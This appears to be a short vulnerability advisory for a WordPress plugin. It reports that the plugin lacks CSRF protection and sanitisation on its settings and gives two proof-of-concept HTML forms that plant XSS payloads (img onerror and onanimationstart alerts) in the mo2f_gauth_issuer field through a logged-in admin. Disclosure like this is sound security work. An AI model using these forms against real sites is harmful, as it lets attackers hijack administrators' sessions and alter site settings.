The plugin does not have CSRF check when saving its settings, and does not sanitise as well as escape them, allowing attackers to make a logged in admin change them and perform Cross-Site Scripting attacks
v < 1.0.4
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?page=mo_view_page" method="POST">
<input type="hidden" name="option" value="mo2f_gauth_appname" />
<input type="hidden" name="mo2f_gauth_issuer" value='"><img src onerror=alert(/XSS/)>' />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
v < 1.0.5
<html>
<body>
<form action="https://example.com/wp-admin/admin.php?page=mo_view_page" method="POST">
<input type="hidden" name="option" value="mo2f_gauth_appname" />
<input type="hidden" name="mo2f_gauth_issuer" value='" style=animation-name:rotation onanimationstart=alert(/XSS/)//' />
<input type="submit" value="Submit request" />
</form>
</body>
</html>